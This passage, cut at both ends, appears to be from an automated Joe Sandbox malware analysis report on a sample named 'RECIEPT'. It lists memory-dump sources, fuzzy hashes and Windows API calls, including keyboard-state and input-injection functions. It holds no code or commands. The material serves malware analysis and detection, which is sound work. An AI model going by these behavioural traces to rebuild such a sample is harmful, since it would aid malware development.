                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                        • String ID:
                                        • API String ID: 3220332590-0
                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                        • String ID:
                                        • API String ID: 1612042205-0
                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove_strncmp
                                        • String ID: >$U$\
                                        • API String ID: 2666721431-237099441
                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$InputSend
                                        • String ID:
                                        • API String ID: 2221674350-0
                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcscpy$_wcscat
                                        • String ID:
                                        • API String ID: 2037614760-0
                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                        • VariantClear.OLEAUT32(?), ref: 00451CA1
                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                        • String ID:
                                        • API String ID: 960795272-0
                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                        APIs
                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                        • EndPaint.USER32(?,?), ref: 00447D13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                        • String ID:
                                        • API String ID: 4189319755-0
                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                        • String ID:
                                        • API String ID: 1976402638-0
                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                        APIs
                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Show$MessageSend
                                        • String ID:
                                        • API String ID: 1871949834-0
                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                        APIs
                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                        • SendMessageW.USER32 ref: 00471AE3
                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                        • String ID:
                                        • API String ID: 3611059338-0
                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                        • String ID:
                                        • API String ID: 1640429340-0
                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                        APIs
                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                        • _wcslen.LIBCMT ref: 004438CD
                                        • _wcslen.LIBCMT ref: 004438E6
                                        • _wcstok.LIBCMT ref: 004438F8
                                        • _wcslen.LIBCMT ref: 0044390C
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                        • _wcstok.LIBCMT ref: 00443931
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                        • String ID:
                                        • API String ID: 3632110297-0
                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                        • String ID:
                                        • API String ID: 752480666-0
                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                        • String ID:
                                        • API String ID: 3275902921-0
                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                        • String ID:
                                        • API String ID: 3275902921-0
                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
